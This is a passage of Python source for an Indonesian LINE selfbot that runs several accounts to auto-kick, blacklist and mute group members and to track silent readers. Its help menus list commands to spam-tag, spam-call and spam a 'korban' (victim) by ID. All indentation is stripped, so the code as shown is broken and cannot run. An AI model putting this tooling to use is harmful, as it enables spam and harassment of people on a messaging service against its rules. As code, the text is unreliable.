"\n ™[Selfbot Hiburan]™\n Gunakan「 " + key + " 」di depannya\n\n" + \
"™↔ " + key + "ID line:「Id Line nya」\n" + \
"™↔ " + key + "Sholat:「Nama Kota」\n" + \
"™↔ " + key + "Cuaca:「Nama Kota」\n" + \
"™↔ " + key + "Lokasi:「Nama Kota」\n" + \
"™↔ " + key + "Music:「Judul Lagu」\n" + \
"™↔ " + key + "Lirik:「Judul Lagu」\n" + \
"™↔ " + key + "Ytmp3:「Judul Lagu」\n" + \
"™↔ " + key + "Ytmp4:「Judul Video」\n" + \
"™↔ " + key + "Profileig:「Nama IG」\n" + \
"™↔ " + key + "Cekdate:「tgl-bln-thn」\n" + \
"™↔ " + key + "Jumlah:「angka」\n" + \
"™↔ " + key + "Spamtag「@」\n" + \
"™↔ " + key + "Spamcall:「jumlahnya」\n" + \
"™↔ " + key + "Spamcall\n" + \
"\n™[ Selfbot Protection ]™\n Jangan gunakan「 " + key + " 」di depannya\n\n" + \
"™↔ " + key + "Notag「on/off」\n" + \
"™↔ " + key + "Semuapro「on/off」\n" + \
"™↔ " + key + "Protecturl「on/off」\n" + \
"™↔ " + key + "Protectjoin「on/off」\n" + \
"™↔ " + key + "Protectkick「on/off」\n" + \
"™↔ " + key + "Protectcancel「on/off」\n" + \
"\n™[ Selfbot Settings ]™\n Jangan gunakan「 " + key + " 」di depannya\n\n" + \
"™↔ " + key + "Sticker「on/off」\n" + \
"™↔ " + key + "Respon「on/off」\n" + \
"™↔ " + key + "Contact「on/off」\n" + \
"™↔ " + key + "Autojoin「on/off」\n" + \
"™↔ " + key + "Autoadd「on/off」\n" + \
"™↔ " + key + "Welcome「on/off」\n" + \
"™↔ " + key + "Autoleave「on/off」\n" + \
"\n™[ Selfbot Admin ]™\n Jangan gunakan「 " + key + " 」di depannya\n\n" + \
"™↔ " + key + "Admin:on\n" + \
"™↔ " + key + "Admin:repeat\n" + \
"™↔ " + key + "Staff:on\n" + \
"™↔ " + key + "Staff:repeat\n" + \
"™↔ " + key + "Bot:on\n" + \
"™↔ " + key + "Bot:repeat\n" + \
"™↔ " + key + "Adminadd「@」\n" + \
"™↔ " + key + "Admindell「@」\n" + \
"™↔ " + key + "Staffadd「@」\n" + \
"™↔ " + key + "Staffdell「@」\n" + \
"™↔ " + key + "Botadd「@」\n" + \
"™↔ " + key + "Botdell「@」\n" + \
"™↔ " + key + "Refresh\n" + \
"™↔ " + key + "Listbot\n" + \
"™↔ " + key + "Listadmin\n" + \
"™↔ " + key + "Listprotect\n" + \
"\nKetik「 Refresh 」Setelah\nmenggunakan command...\n"
return helpMessage
def helpbot():
key = Setmain["keyCommand"]
key = key.title()
helpMessage1 = "™[ Selfbot Blacklist ]™\n Jangan gunakan「 " + key + " 」di depannya\n\n" + \
"™↔ " + key + "Blc\n" + \
"™↔ " + key + "Ban:on\n" + \
"™↔ " + key + "Unban:on\n" + \
"™↔ " + key + "Ban「@」\n" + \
"™↔ " + key + "Unban「@」\n" + \
"™↔ " + key + "Talkban「@」\n" + \
"™↔ " + key + "Untalkban「@」\n" + \
"™↔ " + key + "Talkban:on\n" + \
"™↔ " + key + "Untalkban:on\n" + \
"™↔ " + key + "Banlist\n" + \
"™↔ " + key + "Talkbanlist\n" + \
"™↔ " + key + "Clearban\n" + \
"™↔ " + key + "Refresh\n" + \
"\n™[ Selfbot Menu ]™\n Gunakan「 " + key + " 」di depannya\n\n" + \
"™↔ " + key + "Cek sider\n" + \
"™↔ " + key + "Cek spam\n" + \
"™↔ " + key + "Cek pesan \n" + \
"™↔ " + key + "Cek respon \n" + \
"™↔ " + key + "Cek welcome\n" + \
"™↔ " + key + "Set sider:「Text」\n" + \
"™↔ " + key + "Set spam:「Text」\n" + \
"™↔ " + key + "Set pesan:「Text」\n" + \
"™↔ " + key + "Set respon:「Text」\n" + \
"™↔ " + key + "Set welcome:「Text」\n" + \
"™↔ " + key + "Myname:「Nama」\n" + \
"™↔ " + key + "Bot1name:「Nama」\n" + \
"™↔ " + key + "Bot2name:「Nama」\n" + \
"™↔ " + key + "Bot3name:「Nama」\n" + \
"™↔ " + key + "Bot1up「Kirim fotonya」\n" + \
"™↔ " + key + "Bot2up「Kirim fotonya」\n" + \
"™↔ " + key + "Bot3up「Kirim fotonya」\n" + \
"™↔ " + key + "Gift:「Mid korban」「Jumlah」\n" + \
"™↔ " + key + "Spam:「Mid korban」「Jumlah」\n" + \
"\nKetik「 Refresh 」jika sudah\nmenggunakan command\n"
return helpMessage1
def bot(op):
global time
global ast
global groupParam
try:
if op.type == 0:
return
if op.type == 11:
if op.param1 in protectqr:
try:
if cl.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.reissueGroupTicket(op.param1)
X = cl.getGroup(op.param1)
X.preventedJoinByTicket = True
cl.updateGroup(X)
cl.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
try:
if ki.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ki.reissueGroupTicket(op.param1)
X = ki.getGroup(op.param1)
X.preventedJoinByTicket = True
ki.updateGroup(X)
cl.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
try:
if kk.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kk.reissueGroupTicket(op.param1)
X = kk.getGroup(op.param1)
X.preventedJoinByTicket = True
kk.updateGroup(X)
cl.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
try:
if kc.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kc.reissueGroupTicket(op.param1)
X = kc.getGroup(op.param1)
X.preventedJoinByTicket = True
kc.updateGroup(X)
cl.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
try:
if cl.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.reissueGroupTicket(op.param1)
X = cl.getGroup(op.param1)
X.preventedJoinByTicket = True
cl.updateGroup(X)
cl.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
try:
if ki.getGroup(op.param1).preventedJoinByTicket == False:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ki.reissueGroupTicket(op.param1)
X = ki.getGroup(op.param1)
X.preventedJoinByTicket = True
ki.updateGroup(X)
cl.sendMessage(op.param1, None, contentMetadata={'mid': op.param2}, contentType=13)
except:
pass
if op.type == 13:
if mid in op.param3:
if wait["autoLeave"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"See you next time... 🙏\n Group " +str(ginfo.name))
cl.leaveGroup(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Hello all fams..😜" + str(ginfo.name))
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=[str for str in InviterX if str == tag]
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
#____________________________________________________________________
if Amid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
ki.acceptGroupInvitation(op.param1)
ginfo = ki.getGroup(op.param1)
ki.sendMessage(op.param1,"See you nex time...🙏\n Group " +str(ginfo.name))
ki.leaveGroup(op.param1)
else:
ki.acceptGroupInvitation(op.param1)
ginfo = ki.getGroup(op.param1)
ki.sendMessage(op.param1,"Hello all fams..😃" + str(ginfo.name))
if Bmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kk.acceptGroupInvitation(op.param1)
ginfo = kk.getGroup(op.param1)
ki.sendMessage(op.param1,"See you next time... 🙏\n Group " +str(ginfo.name))
kk.leaveGroup(op.param1)
else:
kk.acceptGroupInvitation(op.param1)
ginfo = kk.getGroup(op.param1)
kk.sendMessage(op.param1,"Hello all fams.. 😀" + str(ginfo.name))
if Cmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
kc.acceptGroupInvitation(op.param1)
ginfo = kc.getGroup(op.param1)
kc.sendMessage(op.param1,"See you next time... 🙏\n Group " +str(ginfo.name))
kc.leaveGroup(op.param1)
else:
kc.acceptGroupInvitation(op.param1)
ginfo = kc.getGroup(op.param1)
kc.sendMessage(op.param1,"Hello all fams.. 🐥" + str(ginfo.name))
if op.type == 13:
if op.param1 in protectinvite:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
try:
group = cl.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
cl.cancelGroupInvitation(op.param1,[_mid])
except:
try:
group = ki.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
ki.cancelGroupInvitation(op.param1,[_mid])
except:
try:
group = kk.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
kk.cancelGroupInvitation(op.param1,[_mid])
except:
try:
group = kc.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
kc.cancelGroupInvitation(op.param1,[_mid])
except:
pass
if op.type == 17:
if op.param2 in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 17:
if op.param1 in welcome:
if op.param2 in Bots:
pass
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2).picturePath
image = 'http://dl.profile.line.naver.jp'+contact
welcomeMembers(op.param1, [op.param2])
cl.sendImageWithURL(op.param1, image)
if op.type == 17:
if op.param1 in protectjoin:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
try:
if op.param3 not in wait["blacklist"]:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
cl.kickoutFromGroup(op.param1,[op.param2])
except:
pass
return
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
if (wait["message"] in [" "," ","\n",None]):
pass
else:
cl.sendText(op.param1, wait["message"])
if op.type == 19:
if op.param1 in protectkick:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if op.type == 32:
if op.param1 in protectcancel:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
wait["blacklist"][op.param2] = True
try:
if op.param3 not in wait["blacklist"]:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
if op.param3 not in wait["blacklist"]:
cl.kickoutFromGroup(op.param1,[op.param2])
except:
pass
return
if op.type == 19:
if mid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
try:
G = ki.getGroup(op.param1)
G.preventedJoinByTicket = False
ki.kickoutFromGroup(op.param1,[op.param2])
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
G = ki.getGroup(op.param1)
G.preventedJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
cl.acceptGroupInvitation(op.param1)
except:
pass
return
if Amid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
try:
G = kk.getGroup(op.param1)
G.preventedJoinByTicket = False
kk.kickoutFromGroup(op.param1,[op.param2])
kk.updateGroup(G)
Ticket = kk.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kk.getGroup(op.param1)
G.preventedJoinByTicket = True
kk.updateGroup(G)
Ticket = kk.reissueGroupTicket(op.param1)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
ki.acceptGroupInvitation(op.param1)
except:
pass
return
if Bmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
try:
G = kc.getGroup(op.param1)
G.preventedJoinByTicket = False
kc.kickoutFromGroup(op.param1,[op.param2])
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
G = kc.getGroup(op.param1)
G.preventedJoinByTicket = True
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.inviteIntoGroup(op.param1,[op.param3])
kk.acceptGroupInvitation(op.param1)
except:
pass
return
if Cmid in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
try:
G = cl.getGroup(op.param1)
G.preventedJoinByTicket = False
cl.kickoutFromGroup(op.param1,[op.param2])
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
G = cl.getGroup(op.param1)
G.preventedJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
kc.acceptGroupInvitation(op.param1)
except:
pass
return
if admin in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param1,admin)
cl.inviteIntoGroup(op.param1,admin)
except:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.findAndAddContactsByMid(op.param1,admin)
ki.inviteIntoGroup(op.param1,admin)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.findAndAddContactsByMid(op.param1,admin)
kk.inviteIntoGroup(op.param1,admin)
except:
pass
return
if staff in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.findAndAddContactsByMid(op.param1,staff)
ki.inviteIntoGroup(op.param1,staff)
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
kk.findAndAddContactsByMid(op.param1,staff)
kk.inviteIntoGroup(op.param1,staff)
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
kc.findAndAddContactsByMid(op.param1,staff)
kc.inviteIntoGroup(op.param1,staff)
except:
pass
return
if op.type == 55:
try:
if op.param1 in Setmain["RAreadPoint"]:
if op.param2 in Setmain["RAreadMember"][op.param1]:
pass
else:
Setmain["RAreadMember"][op.param1][op.param2] = True
else:
pass
except:
pass
if op.type == 55:
if op.param2 in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
if cctv['cyduk'][op.param1]==True:
if op.param1 in cctv['point']:
Name = cl.getContact(op.param2).displayName
if Name in cctv['sidermem'][op.param1]:
pass
else:
cctv['sidermem'][op.param1] += "\n~ " + Name
siderMembers(op.param1, [op.param2])
if op.type == 26:
if wait["selfbot"] == True:
msg = op.message
if msg._from not in Bots:
if wait["talkban"] == True:
if msg._from in wait["Talkblacklist"]:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["detectMention"] == True:
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in Bots:
cl.sendMessage(msg.to, wait["Respontag"])
cl.sendMessage(msg.to, None, contentMetadata={"STKID":"7839705","STKPKGID":"1192862","STKVER":"1"}, contentType=7)
break
if 'MENTION' in msg.contentMetadata.keys() != None:
if wait["Mentionkick"] == True:
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in Bots:
cl.mentiontag(msg.to,[msg._from])
cl.sendMessage(msg.to, "No tag me....")
cl.kickoutFromGroup(msg.to, [msg._from])
break
if msg.contentType == 7:
if wait["sticker"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,"「Cek ID Sticker」\n™↔ STKID : " + msg.contentMetadata["STKID"] + "\n™↔ STKPKGID : " + msg.contentMetadata["STKPKGID"] + "\n™↔ STKVER : " + msg.contentMetadata["STKVER"]+ "\n\n「Link Sticker」" + "\nline://shop/detail/" + msg.contentMetadata["STKPKGID"])
if msg.contentType == 13:
if wait["contact"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
path = cl.getContact(msg.contentMetadata["mid"]).picturePath
image = 'http://dl.profile.line.naver.jp'+path
cl.sendMessage(msg.to,"™↔ Nama : " + msg.contentMetadata["displayName"] + "\n™↔ MID : " + msg.contentMetadata["mid"] + "\n™↔ Status Msg : " + contact.statusMessage + "\n™↔ Picture URL : http://dl.profile.line-cdn.net/" + contact.pictureStatus)
cl.sendImageWithURL(msg.to, image)
if op.type == 25 or op.type == 26:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0 or msg.toType == 2:
if msg.toType == 0:
to = receiver
elif msg.toType == 2:
to = receiver
if msg.contentType == 7:
if wait["sticker"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,"STKID : " + msg.contentMetadata["STKID"] + "\nSTKPKGID : " + msg.contentMetadata["STKPKGID"] + "\nSTKVER : " + msg.contentMetadata["STKVER"]+ "\n\n「Link Sticker」" + "\nline://shop/detail/" + msg.contentMetadata["STKPKGID"])
if msg.contentType == 13:
if wait["contact"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
path = cl.getContact(msg.contentMetadata["mid"]).picturePath
image = 'http://dl.profile.line.naver.jp'+path
cl.sendMessage(msg.to,"™↔ Nama : " + msg.contentMetadata["displayName"] + "\n™↔ MID : " + msg.contentMetadata["mid"] + "\n™↔ Status Msg : " + contact.statusMessage + "\n™↔ Picture URL : http://dl.profile.line-cdn.net/" + contact.pictureStatus)
cl.sendImageWithURL(msg.to, image)
#ADD Bots
if msg.contentType == 13:
if msg._from in admin:
if wait["addbots"] == True:
if msg.contentMetadata["mid"] in Bots:
cl.sendMessage(msg.to,"Contact itu sudah jadi anggota bot")
wait["addbots"] = True
else:
Bots.append(msg.contentMetadata["mid"])
wait["addbots"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke anggota bot")
if wait["dellbots"] == True:
if msg.contentMetadata["mid"] in Bots:
Bots.remove(msg.contentMetadata["mid"])
cl.sendMessage(msg.to,"Berhasil menghapus dari anggota bot")
else:
wait["dellbots"] = True
cl.sendMessage(msg.to,"Contact itu bukan anggota bot saints")
#ADD STAFF
if msg._from in admin:
if wait["addstaff"] == True:
if msg.contentMetadata["mid"] in staff:
cl.sendMessage(msg.to,"Contact itu sudah jadi staff")
wait["addstaff"] = True
else:
staff.append(msg.contentMetadata["mid"])
wait["addstaff"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke staff")
if wait["dellstaff"] == True:
if msg.contentMetadata["mid"] in staff:
staff.remove(msg.contentMetadata["mid"])
cl.sendMessage(msg.to,"Berhasil menghapus dari staff")
wait["dellstaff"] = True
else:
wait["dellstaff"] = True
cl.sendMessage(msg.to,"Contact itu bukan staff")
#ADD ADMIN
if msg._from in admin:
if wait["addadmin"] == True:
if msg.contentMetadata["mid"] in admin:
cl.sendMessage(msg.to,"Contact itu sudah jadi admin")
wait["addadmin"] = True
else:
admin.append(msg.contentMetadata["mid"])
wait["addadmin"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke admin")
if wait["delladmin"] == True:
if msg.contentMetadata["mid"] in admin:
admin.remove(msg.contentMetadata["mid"])
cl.sendMessage(msg.to,"Berhasil menghapus dari admin")
else:
wait["delladmin"] = True
cl.sendMessage(msg.to,"Contact itu bukan admin")
#ADD BLACKLIST
if msg._from in admin:
if wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendMessage(msg.to,"Contact itu sudah ada di blacklist")
wait["wblacklist"] = True
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke blacklist user")
if wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendMessage(msg.to,"Berhasil menghapus dari blacklist user")
else:
wait["dblacklist"] = True
cl.sendMessage(msg.to,"Contact itu tidak ada di blacklist")
#TALKBAN
if msg._from in admin:
if wait["Talkwblacklist"] == True:
if msg.contentMetadata["mid"] in wait["Talkblacklist"]:
cl.sendMessage(msg.to,"Contact itu sudah ada di Talkban")
wait["Talkwblacklist"] = True
else:
wait["Talkblacklist"][msg.contentMetadata["mid"]] = True
wait["Talkwblacklist"] = True
cl.sendMessage(msg.to,"Berhasil menambahkan ke Talkban user")
if wait["Talkdblacklist"] == True:
if msg.contentMetadata["mid"] in wait["Talkblacklist"]:
del wait["Talkblacklist"][msg.contentMetadata["mid"]]
cl.sendMessage(msg.to,"Berhasil menghapus dari Talkban user")
else:
wait["Talkdblacklist"] = True
cl.sendMessage(msg.to,"Contact itu tidak ada di Talkban")
#UPDATE FOTO
if msg.contentType == 1:
if msg._from in admin:
if Setmain["Addimage"] == True:
msgid = msg.id
fotoo = "https://obs.line-apps.com/talk/m/download.nhn?oid="+msgid
headers = cl.Talk.Headers
r = requests.get(fotoo, headers=headers, stream=True)
if r.status_code == 200:
path = os.path.join(os.path.dirname(__file__), 'dataPhotos/%s.jpg' % Setmain["Img"])
with open(path, 'wb') as fp:
shutil.copyfileobj(r.raw, fp)
cl.sendText(msg.to, "Berhasil menambahkan gambar")
Setmain["Img"] = {}
Setmain["Addimage"] = False
if msg.toType == 2:
if msg._from in admin:
if settings["groupPicture"] == True:
path = cl.downloadObjectMsg(msg_id)
settings["groupPicture"] = False
cl.updateGroupPicture(msg.to, path)
cl.sendMessage(msg.to, "Berhasil mengubah foto group")
if msg.contentType == 1:
if msg._from in admin:
if mid in Setmain["RAfoto"]:
path = cl.downloadObjectMsg(msg_id)
del Setmain["RAfoto"][mid]
cl.updateProfilePicture(path)
cl.sendMessage(msg.to,"Foto berhasil dirubah")
if msg.contentType == 1:
if msg._from in admin:
if Amid in Setmain["RAfoto"]:
path = ki.downloadObjectMsg(msg_id)
del Setmain["RAfoto"][Amid]
ki.updateProfilePicture(path)
ki.sendMessage(msg.to,"Foto berhasil dirubah")
elif Bmid in Setmain["RAfoto"]:
path = kk.downloadObjectMsg(msg_id)
del Setmain["RAfoto"][Bmid]
kk.updateProfilePicture(path)
kk.sendMessage(msg.to,"Foto berhasil dirubah")
elif Cmid in Setmain["RAfoto"]:
path = kc.downloadObjectMsg(msg_id)
del Setmain["RAfoto"][Cmid]
kc.updateProfilePicture(path)
kc.sendMessage(msg.to,"Foto berhasil dirubah")
elif Zmid in Setmain["RAfoto"]:
path = sw.downloadObjectMsg(msg_id)
del Setmain["RAfoto"][Zmid]
sw.updateProfilePicture(path)
sw.sendMessage(msg.to,"Foto berhasil dirubah")
if msg.contentType == 1:
if msg._from in admin:
if settings["changePicture"] == True:
path1 = ki.downloadObjectMsg(msg_id)
path2 = kk.downloadObjectMsg(msg_id)
path3 = kc.downloadObjectMsg(msg_id)
settings["changePicture"] = False
ki.updateProfilePicture(path1)
ki.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
kk.updateProfilePicture(path2)
kk.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
kc.updateProfilePicture(path3)
kc.sendMessage(msg.to, "Berhasil mengubah foto profile bot")
if msg.contentType == 0:
if Setmain["autoRead"] == True:
cl.sendChatChecked(msg.to, msg_id)
if text is None:
return
else:
cmd = command(text)
if cmd == "help":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessage = help()
cl.sendMessage(msg.to, str(helpMessage))
if cmd == "bot on":
if msg._from in admin:
wait["selfbot"] = True
cl.sendText(msg.to, "Selfbot diaktifkan")
elif cmd == "bot off":
if msg._from in admin:
wait["selfbot"] = False
